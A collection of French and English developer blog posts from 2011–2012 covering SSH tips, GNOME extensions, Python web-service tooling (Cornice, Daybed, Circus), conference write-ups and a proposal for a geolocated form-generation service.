Problème, les ressources que je vérifie en SSL (HTTPS) me jettent. Je sais pas exactement pourquoi à l’heure qu’il est, mais il semble que lorsque je fais une requête avec Requests je me récupère des Connection Refused. Peut être une sombre histoire de proxy ? En attendant, les appels avec CURL fonctionnent, donc j’ai fait un fallback vers CURL lorsque les autres méthodes échouent. Pas super propre, mais ça fonctionne.

EDIT Finalement, il se trouve que mon serveur était mal configuré. J’utilisais haproxy + stunnel, et la négiciation SSL se passait mal. Une fois SSL et TLS activés, et SSLv2 désactivé, tout fonctionne mieux.

Et voilà

Finalement, j’ai mon joli status-board qui tourne à merveille sur http://status.lolnet.org :-)

Astuces SSH

2012-12-27T00:00:00+01:00

Tunelling

Parce que je m’en rapelle jamais (tête de linote):

$ ssh -f hote -L local:lolnet.org:destination -N

.ssh/config

(merci gaston !)

La directive suivante dans .ssh/config permet de sauter d’hôte en hôte séparés par des “+” :

Host *+*
        ProxyCommand ssh $(echo %h | sed
's/+[^+]*$//;s/\([^+%%]*\)%%\([^+]*\)$/\2 -l \1/;s/:/ -p /')
PATH=.:\$PATH nc -w1 $(echo %h | sed 's/^.*+//;/:/!s/$/ %p/;s/:/ /')

On peut donc spécifier des “sauts” ssh du style:

ssh root@91.25.25.25+192.168.1.1

Ensuite on peut essayer de rajouter:

Host <label_pour_mon_serveur_privé>
    user <monuser(root)>
    IdentityFile  <chemin vers ma clé ssh pour le serveur publique>
    hostname ip_serveur_publique+ip_serveur_privé

Gnome 3, extensions

2012-12-27T00:00:00+01:00

Après avoir tenté pendant un bout de temps unity, le bureau par defaut de ubuntu, j’ai eu envie de changements, et j’ai donc essayé un peu de regarder du coté de gnome 3, à nouveau.

Et finalement, j’ai trouvé quelques extensions qui sont vraiment utiles, que je liste ici.

Antisocial Menu vire les boutons et textes en rapport avec le web social. J’en avais pas besoin puisque je suis connecté à mon instant messenger dans un terminal, en utilisant weechat.
Coverflow Alt-Tab change le switcher d’applications par defaut. Je le trouve bien plus pratique que celui par defaut puisqu’il me permet de voir “en grand” quelle est la fenêtre que je vais afficher.
Media player indicator me permet de voir en temps réel ce qui se passe dans mon lecteur audio. Ça semble ne pas être grand chose, mais ça me manquait. Ça s’intègre niquel avec Spotify, et ça c’est chouette.
Rechercher dans les bookmarks firefox permet de… à votre avis ?

Un peu moins utile mais sait on jamais:

“Advanced Settings in UserMenu” permet d’avoir un raccourci vers les paramètres avancés dans le menu utilisateur (en haut à droite)
Une intégration à Getting things Gnome (un truc de GTD). Je suis en train d’expérimenter avec cet outil, donc je ne sais pas encore si ça va rester, mais pourquoi pas.

Vous pouvez aller faire un tour sur https://extensions.gnome.org/ pour en trouver d’autres à votre gout.

Cheese & code - Wrap-up

2012-10-22T00:00:00+02:00

This week-end I hosted a cheese & code session in the country-side of Angers, France.

We were a bunch of python hackers and it rained a lot, wich forced us to stay inside and to code. Bad.

We were not enough to get rid of all the cheese and the awesome meals, but well, we finally managed it pretty well.

Here is a summary of what we worked on:

Daybed

Daybed started some time ago, and intend to be a replacement to google forms, in term of features, but backed as a REST web service, in python, and open source.

In case you wonder, daybed is effectively the name of a couch. We chose this name because of the similarities (in the sound) with db, and because we’re using CouchDB as a backend.

We mainly hacked on daybed and are pretty close to the release of the first version, meaning that we have something working.

The code is available on github, and we also wrote a small documentation for it.

Mainly, we did a lot of cleanup, rewrote a bunch of tests so that it would be easier to continue to work on the project, and implemented some minor features. I’m pretty confidend that we now have really good basis for this project.

Also, we will have a nice todolist application, with the backend and the frontend, in javascript / html / css, you’ll know more when it’ll be ready :-)

Once we have something good enough, we’ll release the first version and I’ll host it somewhere so that people can play with it.

Cornice

Daybed is built on top of Cornice, a framework to ease the creation of web-services.

At Pycon France, we had the opportunity to attend a good presentation about SPORE. SPORE is a way to describe your REST web services, as WSDL is for WS-* services. This allows to ease the creation of generic SPORE clients, which are able to consume any REST API with a SPORE endpoint.

Here is how you can let cornice describe your web service for you

from cornice.ext.spore import generate_spore_description
from cornice.service import Service, get_services

spore = Service('spore', path='/spore', renderer='jsonp')
@spore.get
def get_spore(request):
    services = get_services()
    return generate_spore_description(services, 'Service name',
                                      request.application_url, '1.0')

And you’ll get a definition of your service, in SPORE, available at /spore.

Of course, you can use it to do other things, like generating the file locally and exporting it wherever it makes sense to you, etc.

I released today Cornice 0.11, which adds into other things the support for SPORE, plus some other fixes we found on our way.

Respire

Once you have the description of the service, you can do generic clients consuming them!

We first wanted to contribute to spyre but it was written in a way that wasn’t supporting to POST data, and they were using their own stack to handle HTTP. A lot of code that already exists in other libraries.

While waiting the train with Rémy, we hacked something together, named “Respire”, a thin layer on top of the awesome Requests library.

We have a first version, feel free to have a look at it and provide enhancements if you feel like it. We’re still hacking on it so it may break (for the better), but that had been working pretty well for us so far.

You can find the project on github, but here is how to use it, really quickly (these examples are how to interact with daybed)

>>> from respire import client_from_url

>>> # create the client from the SPORE definition
>>> cl = client_from_url('http://localhost:8000/spore')

>>> # in daybed, create a new definition
>>> todo_def = {
...    "title": "todo",
...    "description": "A list of my stuff to do",
...    "fields": [
...        {
...            "name": "item",
...            "type": "string",
...            "description": "The item"
...        },
...        {
...            "name": "status",
...            "type": "enum",
...            "choices": [
...                "done",
...                "todo"
...            ],
...            "description": "is it done or not"
...        }
...    ]}
>>> cl.put_definition(model_name='todo', data=todo_def)
>>> cl.post_data(model_name='todo', data=dict(item='make it work', status='todo'))
{u'id': u'9f2c90c0529a442cfdc03c191b022cf7'}
>>> cl.get_data(model_name='todo')

Finally, we were out of cheese so everyone headed back to their respective houses and cities.

Until next time?

Circus sprint at PyconFR

2012-09-17T00:00:00+02:00

Last Thursday to Sunday, Pycon France took place, in Paris. It was the opportunity to meet a lot of people and to talk about python awesomness in general.

We had three tracks this year, plus sprints the two first days. We sprinted on Circus, the process and socket manager we’re using at Mozilla for some of our setups.

The project gathered some interest, and we ended up with 5 persons working on it. Of course, we spent some time explaining what is Circus, how it had been built, a lot of time talking about use-cases and possible improvements, but we also managed to add new features.

Having people wanting to sprint on our projects is exciting because that’s when making things in the open unleashes its full potential. You can’t imagine how happy I was to have some friends come and work on this with us :)

Here is a wrap-up of the sprint:

Autocompletion on the command-line

Remy Hubscher worked on the command-line autocompletion. Now we have a fancy command-line interface which is able to aucomplete if you’re using bash. It seems that not that much work is needed to make it happen on zsh as well :)

Have a look at the feature

On the same topic, we now have a cool shell for Circus. If you start the circusctl command without any option, you’ll end-up with a cool shell. Thanks Jonathan Dorival for the work on this! You can have a look at the pull request.

Future changes to the web ui

Rachid Belaid had a deep look at the source code and is much more familiarized to it now than before. We discussed the possibility to change the implementation of the web ui, and I’m glad of this. Currently, it’s done with bottle.py and we want to switch to pyramid.

He fixed some issues that were in the tracker, so we now can have the age of watchers in the webui, for instance.

Bug and doc fixing

While reading the source code, we found some inconsistencies and fixed them, with Mathieu Agopian. We also tried to improve the documentation at different levels.

Documentation still needs a lot of love, and I’m planning to spend some time on this shortly. I’ve gathered a bunch of feedback on this

Circus clustering capabilities

One feature I wanted to work on during this sprint was the clustering abilities of Circus. Nick Pellegrino made an internship on this topic at Mozilla so we spent some time to review his pull requests.

A lot of code was written for this so we discussed a bunch of things regarding all of this. It took us more time than expected (and I still need to spend more time on this to provide appropriate feedback), but it allowed us to have a starting-point about what this clustering thing could be.

Remy wrote a good summary about our brainstorming so I’ll not do it again here, but feel free to contact us if you have ideas on this, they’re very welcome!

Project management

We’ve had some inquiries telling us that’s not as easy as it should to get started with the Circus project. Some of the reasons are that we don’t have any release schedule, and that the documentation is hairy enough to lost people, at some point :)

That’s something we’ll try to fix soon :)

PyconFR was a very enjoyable event. I’m looking forward to meet the community again and discuss how Circus can evolve in ways that are interesting to everyone.

Tarek and me are going to Pycon ireland, feel free to reach us if you’re going there, we’ll be happy to meet and enjoy beers!

Refactoring Cornice

2012-05-01T00:00:00+02:00

After working for a while with Cornice to define our APIs at Services, it turned out that the current implementation wasn’t flexible enough to allow us to do what we wanted to do.

Cornice started as a toolkit on top of the pyramid routing system, allowing to register services in a simpler way. Then we added some niceties such as the ability to automatically generate the services documentation or returning the correct HTTP headers as defined by the HTTP specification without the need from the developer to deal with them nor to know them.

If you’re not familiar with Cornice, here is how you define a simple service with it:

from cornice.service import Service
bar = Service(path="/bar")

@bar.get(validators=validators, accept='application/json')
def get_drink(request):
    # do something with the request (with moderation).

This external API is quite cool, as it allows to do a bunch of things quite easily. For instance, we’ve written our token-server code on top of this in a blast.

The burden

The problem with this was that we were mixing internally the service description logic with the route registration one. The way we were doing this was via an extensive use of decorators internally.

The API of the cornice.service.Service class was as following (simplified so you can get the gist of it).

class Service(object):

    def __init__(self, **service_kwargs):
        # some information, such as the colander schemas (for validation),
        # the defined methods that had been registered for this service and
        # some other things were registered as instance variables.
        self.schemas = service_kwargs.get(schema', None)
        self.defined_methods = []
        self.definitions = []

    def api(self, **view_kwargs):
        """This method is a decorator that is being used by some alias
        methods.
        """
        def wrapper(view):
            # all the logic goes here. And when I mean all the logic, I
            # mean it.
            # 1. we are registering a callback to the pyramid routing
            #    system so it gets called whenever the module using the
            #    decorator is used.
            # 2. we are transforming the passed arguments so they conform
            #    to what is expected by the pyramid routing system.
            # 3. We are storing some of the passed arguments into the
            #    object so we can retrieve them later on.
            # 4. Also, we are transforming the passed view before
            #    registering it in the pyramid routing system so that it
            #    can do what Cornice wants it to do (checking some rules,
            #    applying validators and filters etc.
        return wrapper

    def get(self, **kwargs):
        """A shortcut of the api decorator"""
        return self.api(request_method="GET", **kwargs)

I encourage you to go read the entire file. on github so you can get a better opinion on how all of this was done.

A bunch of things are wrong:

first, we are not separating the description logic from the registration one. This causes problems when we need to access the parameters passed to the service, because the parameters you get are not exactly the ones you passed but the ones that the pyramid routing system is expecting. For instance, if you want to get the view get_drink, you will instead get a decorator which contains this view.
second, we are using decorators as APIs we expose. Even if decorators are good as shortcuts, they shouldn’t be the default way to deal with an API. A good example of this is how the resource module consumes this API. This is quite hard to follow.
Third, in the api method, a bunch of things are done regarding inheritance of parameters that are passed to the service or to its decorator methods. This leaves you with a really hard to follow path when it comes to add new parameters to your API.

How do we improve this?

Python is great because it allows you to refactor things in an easy way. What I did isn’t breaking our APIs, but make things way simpler to hack-on. One example is that it allowed me to add features that we wanted to bring to Cornice really quickly (a matter of minutes), without touching the API that much.

Here is the gist of the new architecture:

class Service(object):
    # we define class-level variables that will be the default values for
    # this service. This makes things more extensible than it was before.
    renderer = 'simplejson'
    default_validators = DEFAULT_VALIDATORS
    default_filters = DEFAULT_FILTERS

    # we also have some class-level parameters that are useful to know
    # which parameters are supposed to be lists (and so converted as such)
    # or which are mandatory.
    mandatory_arguments = ('renderer',)
    list_arguments = ('validators', 'filters')

    def __init__(self, name, path, description=None, **kw):
        # setup name, path and description as instance variables
        self.name = name
        self.path = path
        self.description = description

        # convert the arguments passed to something we want to store
        # and then store them as attributes of the instance (because they
        # were passed to the constructor
        self.arguments = self.get_arguments(kw)
        for key, value in self.arguments.items():
            setattr(self, key, value)

        # we keep having the defined_methods tuple and the list of
        # definitions that are done for this service
        self.defined_methods = []
        self.definitions = []

    def get_arguments(self, conf=None):
        """Returns a dict of arguments. It does all the conversions for
        you, and uses the information that were defined at the instance
        level as fallbacks.
        """

    def add_view(self, method, view, **kwargs):
        """Add a view to this service."""
        # this is really simple and looks a lot like this
        method = method.upper()
        self.definitions.append((method, view, args))
        if method not in self.defined_methods:
            self.defined_methods.append(method)

    def decorator(self, method, **kwargs):
    """This is only another interface to the add_view method, exposing a
    decorator interface"""
        def wrapper(view):
            self.add_view(method, view, **kwargs)
            return view
        return wrapper

So, the service is now only storing the information that’s passed to it and nothing more. No more route registration logic goes here. Instead, I added this as another feature, even in a different module. The function is named register_service_views and has the following signature:

register_service_views(config, service)

To sum up, here are the changes I made:

Service description is now separated from the route registration.
cornice.service.Service now provides a hook_view method, which is not a decorator. decorators are still present but they are optional (you don’t need to use them if you don’t want to).
Everything has been decoupled as much as possible, meaning that you really can use the Service class as a container of information about the services you are describing. This is especially useful when generating documentation.

As a result, it is now possible to use Cornice with other frameworks. It means that you can stick with the service description but plug any other framework on top of it. cornice.services.Service is now only a description tool. To register routes, one would need to read the information contained into this service and inject the right parameters into their preferred routing system.

However, no integration with other frameworks is done at the moment even if the design allows it.

The same way, the sphinx description layer is now only a consumer of this service description tool: it looks at what’s described and build-up the documentation from it.

The resulting branch is not merged yet. Still, you can have a look at it.

Any suggestions are of course welcome :-)

Djangocong 2012

2012-04-16T00:00:00+02:00

Ce week-end, c’était djangocong, une conférence autour de django, de python et du web, qui avait lieu dans le sud, à Carnon-plage, à quelques kilomètres de Montpellier la belle.

J’ai vraiment apprécié les trois jours passés avec cette bande de geeks. Je m’attendais à des nerds, j’y ai trouvé une qualité d’écoute, des personnes qui partagent des valeurs qui leur sont chères, mais qui ne limitent pas leurs discussions à du technique. Eeeh ouais, encore un préjugé qui tombe, tiens :)

En tant que hackers, on a le moyen de créer des outils qui sont utiles à tous, et qui peuvent être utiles pour favoriser la collaboration et la mise en commun des données. J’ai eu l’occasion de discuter de projets tournant autour de l’entraide, que ça soit pour mettre en lien des associations d’économie sociale et solidaire (ESS) ou simplement pour que les populations non tech puissent utiliser toute la puissance de l’outil qu’est le web.

Au niveau du format des conférences, je ne savais pas trop à quoi m’attendre, au vu des échos de l’an dernier, mais c’était adapté: des mini-confs de 12mn le samedi matin + début d’aprem, en mode no-wifi pour récupérer une qualité d’écoute. Et contrairement à mes attentes, ce n’est pas trop court. Pas mal de retours d’expérience pour le coup, et une matinée pas vraiment techniques, mais ça pose le décor et permet de savoir qui fait quoi.

Parmi l’ensemble des conférences du matin, je retiens principalement celle de Mathieu Leplatre, “des cartes d’un autre monde”, qui m’a réellement bluffée quand à la facilité de créer des cartes avec TileMill, et qui me pousse à reconsidérer le fait que “la carto, c’est compliqué”. La vidéo est (déja !) disponible en ligne, je vous invite à la regarder (c’est une 15aine de minutes) pour vous faire un avis ;)

Une fois les conf passées, ça reste très intéressant, voire plus: il reste un jour et demi pour discuter avec les autres présents. On a pu se retrouver avec Mathieu pour discuter de “notre” projet “carto forms”, qui à finalement pu se redéfinir un peu plus et donner naissance à un README. On en à profité pour lui choisir un nouveau nom: “daybed”, en référence à couchdb.

Ça devrait se transformer en code d’ici peu. La curiosité aidant, on a pu discuter du projet avec d’autres personnes et affiner les attentes de chacun pour finalement arriver à quelque chose d’assez sympathique.

J’ai aussi pu me rendre compte que pas mal de monde utilise pelican, le bout de code que j’ai codé pour générer ce blog, et avoir des retours utiles ! Probablement des réflexions à venir sur comment éviter qu’un projet open-source ne devienne chronophage, et sur comment réussir à garder une qualité dans le code source tout en ne froissant pas les contributeurs.

Bien évidemment, c’était aussi l’occaz de rencontrer des gens qu’on ne voir que sur les inter-nets, et de discuter un brin de tout ce qui fait que notre monde est chouette et moins chouette.

Entres autres faits notoires, JMad a perdu au baby-foot face à Exirel, même en m’ayant à ses cotés pour le déconcentrer (et je suis un joueur d’un autre monde - en d’autres termes, je suis nul), David`bgk ne s’est pas levé pour aller courir le dimanche matin (il avait dit 5 heures!), Les suisses ont essayé de me convertir à coup d’abricotine, j’ai perdu au skulls-n-roses en quelques tours et on a allumé un feu chez Stéphane le dimanche soir (oui oui, à montpellier, mi avril, je vous le dis qu’ils mentent avec leur soit disant soleil).

Et c’est sans parler de la brasucade …

Bref, vivement la prochaine (et allez, cette fois ci je ferais une présentation !)

Génération de formulaires, geolocalisés ?

2012-04-02T00:00:00+02:00

On a un plan. Un “truc de ouf”.

À plusieurs reprises, des amis m’ont demandé de leur coder la même chose, à quelques détails près: une page web avec un formulaire qui permettrait de soumettre des informations géographiques, lié à une carte et des manières de filtrer l’information.

L’idée fait son bout de chemin, et je commence à penser qu’on peut même avoir quelque chose de vraiment flexible et utile. J’ai nommé le projet carto-forms pour l’instant (mais c’est uniquement un nom de code).

Pour résumer: et si on avait un moyen de construire des formulaires, un peu comme Google forms, mais avec des informations géographiques en plus?

Si vous ne connaissez pas Google forms, il s’agit d’une interface simple d’utilisation pour générer des formulaires et récupérer des informations depuis ces derniers.

Google forms est un super outil mais à mon avis manque deux choses importantes: premièrement, il s’agit d’un outil propriétaire (oui, on peut aussi dire privateur) et il n’est donc pas possible de le hacker un peu pour le faire devenir ce qu’on souhaite, ni l’installer sur notre propre serveur. Deuxièmement, il ne sait pas vraiment fonctionner avec des informations géographiques, et il n’y à pas d’autre moyen de filtrer les informations que l’utilisation de leur système de feuilles de calcul.

Après avoir réfléchi un petit peu à ça, j’ai contacté Mathieu et les anciens collègues de chez Makina Corpus, puisque les projets libres à base de carto sont à même de les intéresser.

Imaginez le cas suivant:

Dans une “mapping party”, on choisit un sujet particulier à cartographier et on design un formulaire (liste des champs (tags) a remplir + description + le type d’information) ;
Sur place, les utilisateurs remplissent les champs du formulaire avec ce qu’ils voient. Les champs géolocalisés peuvent être remplis automatiquement avec la géolocalisation du téléphone ;
À la fin de la journée, il est possible de voir une carte des contributions, avec le formulaire choisi ;
Un script peut importer les résultats et les publier vers OpenStreetMap.

Quelques cas d’utilisation

J’arrive à imaginer différents cas d’utilisation pour cet outil. Le premier est celui que j’ai approximativement décrit plus haut: la génération de cartes de manière collaborative, avec des filtres à facettes. Voici un flux d’utilisation général:

Un “administrateur” se rend sur le site web et crée un nouveau formulaire pour l’ensemble des évènements alternatifs. Il crée les champs suivants:
- Nom: le champ qui contient le nom de l’évènement.
- Catégorie: la catégorie de l’évènement (marche, concert, manifestation…). Il peut s’agir d’un champ à multiples occurrences.
- Le lieu de l’évènement. Celui-ci peut être donné soit par une adresse soit en sélectionnant un point sur une carte.
- Date: la date de l’évènement (un “date picker” peut permettre cela facilement)
Chaque champ dans le formulaire a des informations sémantiques associées (oui/non, multiple sélection, date, heure, champ géocodé, sélection carto, etc.)
Une fois terminé, le formulaire est généré et une URL permet d’y accéder. (par exemple http://forms.notmyidea.org/alternatives).
Une API REST permet à d’autres applications d’accéder aux informations et d’en ajouter / modifier de nouvelles.
Il est maintenant possible de donner l’URL à qui voudra en faire bon usage. N’importe qui peut ajouter des informations. On peut également imaginer une manière de modérer les modifications si besoin est.
Bien sur, la dernière phase est la plus intéressante: il est possible de filtrer les informations par lieu, catégorie ou date, le tout soit via une API REST, soit via une jolie carte et quelques contrôles bien placés, dans le navigateur.

Vous avez dû remarquer que le processus de création d’un formulaire est volontairement très simple. L’idée est que n’importe qui puisse créer des cartes facilement, en quelques clics. Si une API bien pensée suit, on peut imaginer faire de la validation coté serveur et même faire des applications pour téléphone assez simplement.

Pour aller un peu plus loin, si on arrive à penser un format de description pour le formulaire, il sera possible de construire les formulaires de manière automatisée sur différentes plateformes et également sur des clients génériques.

On imagine pas mal d’exemples pour ce projet: des points de recyclage, les endroits accessibles (pour fauteuils roulants etc.), identification des arbres, bons coins à champignons, recensement des espèces en voie de disparition (l’aigle de Bonelli est actuellement suivi en utilisant une feuille de calcul partagée !), suivi des espèces dangereuses (le frelon asiatique par exemple), cartographier les points d’affichage publicitaires, participation citoyenne (graffitis, nids de poule, voir http://fixmystreet.ca), geocaching, trajectoires (randonnées, coureurs, cyclistes)…

Voici quelques exemples où ce projet pourrait être utile (la liste n’est pas exhaustive):

Un backend SIG simple à utiliser

Disons que vous êtes développeur mobile. Vous ne voulez pas vous encombrer avec PostGIS ou écrire du code spécifique pour récupérer et insérer des données SIG! Vous avez besoin de Carto-Forms! Une API simple vous aide à penser vos modèles et vos formulaires, et cette même API vous permet d’insérer et de récupérer des données. Vous pouvez vous concentrer sur votre application et non pas sur la manière dont les données géographiques sont stockées et gérées.

En d’autres termes, vous faites une distinction entre le stockage des informations et leur affichage.

Si vous êtes un développeur django, plomino, drupal etc. vous pouvez développer un module pour “plugger” vos modèles et votre interface utilisateur avec celle de Carto-Forms. De cette manière, il est possible d’exposer les formulaires aux utilisateurs de vos backoffices. De la même manière, il est possible d’écrire des widgets qui consomment des données et les affichent (en utilisant par exemple une bibliothèque javascript de webmapping).

Un outil de visualisation

Puisque les données peuvent être proposées de manière automatisée en utilisant l’API, vous pouvez utiliser la page de résultat de Carto-forms comme un outil de visualisation.

Il est possible d’explorer mon jeu de données en utilisant des filtres sur chacun des champs. La recherche à facettes peut être une idée pour faciliter ce filtrage. Une carte affiche le résultat. Vous avez l’impressoin d’être en face d’un système d’aide à la décision !

Évidemment, il est possible de télécharger les données brutes (geojson, xml). Idéalement, le mieux serait d’obtenir ces données filtrées directement depuis une API Web, et un lien permet de partager la page avec l’état des filtres et le niveau de zoom / la localisation de la carte.

Un service générique pour gérer les formulaires

Si vous souhaitez générer un fichier de configuration (ou ce que vous voulez, messages emails, …) vous aurez besoin d’un formulaire et d’un template pour injecter les données proposées par les utilisateurs et récupérer un résultat.

Un service de gestion des formulaires pourrait être utile pour créer des formulaires de manière automatique et récupérer les données “nettoyées” et “validées”.

On peut imaginer par exemple l’utilisation d’un système de templates externe reposant sur carto-forms. Celui-ci “parserait” le contenu des templates et pourrait le lier aux informations ajoutées par les utilisateurs via un formulaire.

Pour ce cas particulier, il n’y a pas besoin d’informations géographiques (SIG). Il s’agit quasiment du service proposé actuellement par Google forms.

Ça n’existe pas déjà tout ça ?

Bien sur, il y a Google forms, qui vous permet de faire ce genre de choses, mais comme je l’ai précisé plus haut, il ne s’agit pas exactement de la même chose.

Nous avons découvert https://webform.com qui permet de créer des formulaires avec un système de drag’n’drop. J’adorerais reproduire quelque chose de similaire pour l’interface utilisateur. Par contre ce projet ne gère pas les appels via API et les informations de géolocalisation …

L’idée de http://thoth.io est également assez sympathique: une api très simple pour stocker et récupérer des données. En plus de ça, carto-forms proposerait de la validation de données et proposerait un support des points SIG (point, ligne, polygone).

http://mapbox.com fait également un superbe travail autour de la cartographie, mais ne prends pas en compte le coté auto-génération de formulaires…

On est parti ?!

Comme vous avez pu vous en rendre compte, il ne s’agit pas d’un problème outrageusement complexe. On a pas mal discuté avec Mathieu, à propos de ce qu’on souhaite faire et du comment. Il se trouve qu’on peut sûrement s’en sortir avec une solution élégante sans trop de problèmes. Mathieu est habitué à travailler autour des projets de SIG (ce qui est parfait parce que ce n’est pas mon cas) et connaît son sujet. Une bonne opportunité d’apprendre!

On sera tous les deux à Djangocong le 14 et 15 Avril, et on prévoit une session de tempête de cerveau et un sprint sur ce projet. Si vous êtes dans le coin et que vous souhaitez discuter ou nous filer un coup de patte, n’hésitez pas!

On ne sait pas encore si on utilisera django ou quelque chose d’autre. On a pensé un peu à CouchDB, son système de couchapps et geocouch, mais rien n’est encore gravé dans le marbre ! N’hésitez pas à proposer vos solutions ou suggestions.

Voici le document etherpad sur lequel on a travaillé jusqu’à maintenant: http://framapad.org/carto-forms. N’hésitez pas à l’éditer et à ajouter vos commentaires, c’est son objectif!

Merci à Arnaud pour la relecture et la correction de quelques typos dans le texte :)

Thoughts about a form generation service, GIS enabled

2012-04-02T00:00:00+02:00

Written by Alexis Métaireau & Mathieu Leplatre

We have a plan. A “fucking good” one.

A bunch of friends asked me twice for quite the same thing: a webpage with a form, tied to a map generation with some information filtering. They didn’t explicitly ask that but that’s the gist of it.

This idea has been stuck in my head since then and I even think that we can come out with something a little bit more flexible and useful. I’ve named it carto-forms for now, but that’s only the “codename”.

To put it shortly: what if we had a way to build forms, ala Google forms, but with geographic information in them?

If you don’t know Google forms, it means having an user-friendly way to build forms and to use them to gather information from different users.

In my opinion, Google forms is missing two important things: first, it’s not open-source, so it’s not possible to hack it or even to run it on your own server. Second, it doesn’t really know how to deal with geographic data, and there is no way to filter the information more than in a spreadsheet.

I knew that Mathieu and some folks at Makina Corpus would be interested in this, so I started a discussion with him on IRC and we refined the details of the project and its objectives.

Imagine the following:

For a mapping party, we choose a specific topic to map and design the form (list of fields (i.e. tags) to be filled + description + type of the information) ;
In situ, users fill the form fields with what they see. Geo fields can be pre-populated using device geolocation ;
At the end of the day, we can see a map with all user contributions seized through this particular form ;
If relevant, a script could eventually import the resulting dataset and publish/merge with OpenStreetMap.

Some use cases

I can see some use cases for this. The first one is a collaborative map, with facet filtering. Let’s draw a potential user flow:

An “administrator” goes to the website and creates a form to list all the alternative-related events. He creates the following fields:
- Name: a plain text field containing the name of the event.
- Category: the category of the event. Can be a finite list.
- Location: The location of the event. It could be provided by selecting a point on a map or by typing an address.
- Date: the date of the event (a datepicker could do the trick)
Each field in the form has semantic information associated with it (yes/no, multiple selection, date-time, geocoding carto, carto selection etc)
Once finished, the form is generated and the user gets an url (say http://forms.notmyidea.org/alternatives) for it.
REST APIs allow third parties to get the form description and to push/edit/get information from there.
He can communicate the address in any way he wants to his community so they can go to the page and add information to it.
Then, it is possible to filter the results per location / date or category. This can be done via API calls (useful for third parties) or via a nice interface in the browser.

So, as you may have noticed, this would allow us to create interactive maps really easily. It’s almost just a matter of some clicks to the users. If we also come up with a nice Web API for this, we could do server-side validation and build even phone applications easily.

To push the cursor a bit further, if we can come with a cool description format for the forms, we could even build the forms dynamically on different platforms, with generic clients.

As mentioned before, the idea of a simple tool to support collaborative mapping fullfils a recurring necessity !

We envision a lot of example uses for this : recycling spots, accessible spots (wheelchairs, etc.), trees identification, mushrooms picking areas, tracking of endangered species (e.g. Bonelli’s Eagle is currently tracked by sharing a spreadsheet), spotting of dangerous species (e.g. asian predatory wasps), map advertisement boards (most cities do not track them!), citizen reporting (e.g. graffiti, potholes, garbage, lightning like http://fixmystreet.ca), geocaching, trajectories (e.g hiking, runners, cyclists)…

Here are some other examples of where carto-forms could be useful:

Simple GIS storage backend

Let’s say you are a mobile developer, you don’t want to bother with PostGIS nor write a custom and insecure code to insert and retrieve your GIS data! You need carto-forms! A simple API helps you design your models/forms and the same API allows you to CRUD and query your data. Thus, you only need to focus on your application, not on how GIS data will be handled.

We make a distinction between storage and widgets.

Besides, if you are a django / drupal / plomino… maintainer : you can develop a module to “plug” your models (content types) and UI to carto-forms! Carto forms are then exposed to your backoffice users (ex: drupal admin UI, django adminsite), and likewise you can write your own HTML widgets that consume datasets in frontend views (facets in JSON/XML, and map data in GeoJSON).

Visualization tool

Since data submission can be done programmatically using the API, you could use Carto-forms results page as a visualization tool.

You can explore your dataset content using filters related to each form field. Facets filtering is a great advantage, and a map shows the resulting features set. You feel like you’re in front of a decision support system!

Of course, filtered raw data can be downloaded (GeoJSON, XML) and a permalink allows to share the page with the state of the filters and the zoom/location of the map.

Generic forms service

If you want to generate a configuration file (or whatever, email messages, …), you will need a form and a template to inlay user submitted values and get the result.

A form service would be really useful to create forms programmatically and retrieve cleaned and validated input values.

You could run a dedicated template service based on carto-forms! Parsing a template content, this external service could create a form dynamically and bind them together. The output of the form service (fields => values) would be bound to the input of a template engine (variables => final result).

Note that for this use-case, there is no specific need of GIS data nor storage of records for further retrieval.

What’s out in the wild already?

Of course, there is Google forms, which allows you to do these kind of things, but it’s closed and not exactly what we are describing here.

We’ve discovered the interesting https://webform.com/ which allows one to create forms with a nice drag-n-drop flow. I would love to reproduce something similar for the user experience. However, the project doesn’t handle APIs and geolocation information.

The idea of http://thoth.io is very attractive : an extremely simple web API to store and retrieve data. In addition, carto-forms would do datatype validation and have basic GIS fields (point, line, polygon).

http://mapbox.com also did an awesome work on cartography, but didn’t take into account the form aspect we’re leveraging here.

So… Let’s get it real!

As you may have understood, this isn’t a really complicated problem. We have been sometimes chatting about that with Mathieu about what we would need and how we could achieve this.

We can probably come with an elegant solution without too much pain. Mathieu is used to work with GIS systems (which is really cool because I’m not at all) and knows his subject, so that’s an opportunity to learn ;-)

We will be at Djangocong on April 14 and 15 and will probably have a brainstorming session and a sprint on this, so if you are around and want to help us, or just to discuss, feel free to join!

We don’t know yet if we will be using django for this or something else. We have been thinking about couchdb, couchapps and geocouch but nothing is written in stone yet. Comments and proposals are welcome!

Here is the etherpad document we worked on so far: http://framapad.org/carto-forms. Don’t hesitate to add your thoughts and edit it, that’s what it’s made for!

Thanks to Arnaud and Fuzzmz for proof-reading and typo fixing.

Introducing Cornice

2011-12-07T00:00:00+01:00

Wow, already my third working day at Mozilla. Since Monday, I’ve been working with Tarek Ziadé, on a pyramid REST-ish toolkit named Cornice.

Its goal is to take care for you of what you’re usually missing so you can focus on what’s important. Cornice provides you facilities for validation of any kind.

The goal is to simplify your work, but we don’t want to reinvent the wheel, so it is easily pluggable with validations frameworks, such as Colander.

Handling errors and validation

Here is how it works:

service = Service(name="service", path="/service")


def is_awesome(request):
    if not 'awesome' in request.GET:
        request.errors.add('query', 'awesome',
                            'the awesome parameter is required')


@service.get(validator=is_awesome)
def get1(request):
    return {"test": "yay!"}

All the errors collected during the validation process, or after, are collected before returning the request. If any, a error 400 is fired up, with the list of problems encountered returned as a nice json list response (we plan to support multiple formats in the future)

As you might have seen, request.errors.add takes three parameters: location, name and description.

location is where the error is located in the request. It can either be “body”, “query”, “headers” or “path”. name is the name of the variable causing problem, if any, and description contains a more detailed message.

Let’s run this simple service and send some queries to it:

$ curl -v http://127.0.0.1:5000/service
> GET /service HTTP/1.1
> Host: 127.0.0.1:5000
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 400 Bad Request
< Content-Type: application/json; charset=UTF-8
[{"location": "query", "name": "awesome", "description": "You lack awesomeness!"}

I’ve removed the extra clutter from the curl’s output, but you got the general idea.

The content returned is in JSON, and I know exactly what I have to do: add an “awesome” parameter in my query. Let’s do it again:

$ curl http://127.0.0.1:5000/service?awesome=yeah
{"test": "yay!"}

Validators can also convert parts of the request and store the converted value in request.validated. It is a standard dict automatically attached to the requests.

For instance, in our validator, we can chose to validate the parameter passed and use it in the body of the webservice:

service = Service(name="service", path="/service")


def is_awesome(request):
    if not 'awesome' in request.GET:
        request.errors.add('query', 'awesome',
                            'the awesome parameter is required')
    else:
        request.validated['awesome'] = 'awesome ' + request.GET['awesome']


